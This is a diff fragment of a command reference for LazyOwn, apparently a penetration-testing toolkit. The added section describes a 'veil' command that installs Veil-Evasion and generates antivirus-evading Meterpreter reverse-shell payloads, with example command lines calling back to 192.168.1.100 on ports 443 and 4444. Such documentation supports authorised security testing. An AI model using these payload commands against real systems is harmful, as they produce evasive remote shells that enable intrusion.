grisuno/LazyOwn/COMMANDS.md

 a library like `requests` for HTTP operations if security and efficiency are concerns.

+## veil
+Generates payloads using Veil-Evasion with various options.
+Veil-Evasion is a payload creation framework for generating payloads that evade antivirus detection.
+This function checks if `Veil-Evasion` is installed and installs it if necessary.
+It then runs `Veil-Evasion` with the specified parameters to create various payloads.

+:param line: Not used in this implementation but reserved for future use.

+:returns: None

+Manual execution:
+To manually generate a payload using Veil-Evasion, use the following command:
+    ./Veil-Evasion.py -p <PAYLOAD> --<OPTION> <VALUE>

+Replace the placeholders with the desired values.
+For example:
+    ./Veil-Evasion.py -p python/meterpreter/rev_https LHOST=192.168.1.100 LPORT=443

+Example usage:
+    veil python_meterpreter_rev_https LHOST=192.168.1.100 LPORT=443
+    veil ruby_meterpreter_rev_tcp LHOST=192.168.1.100 LPORT=4444

 ## find_tgts
 Finds and returns a list of target hosts with port 445 open in the specified subnet.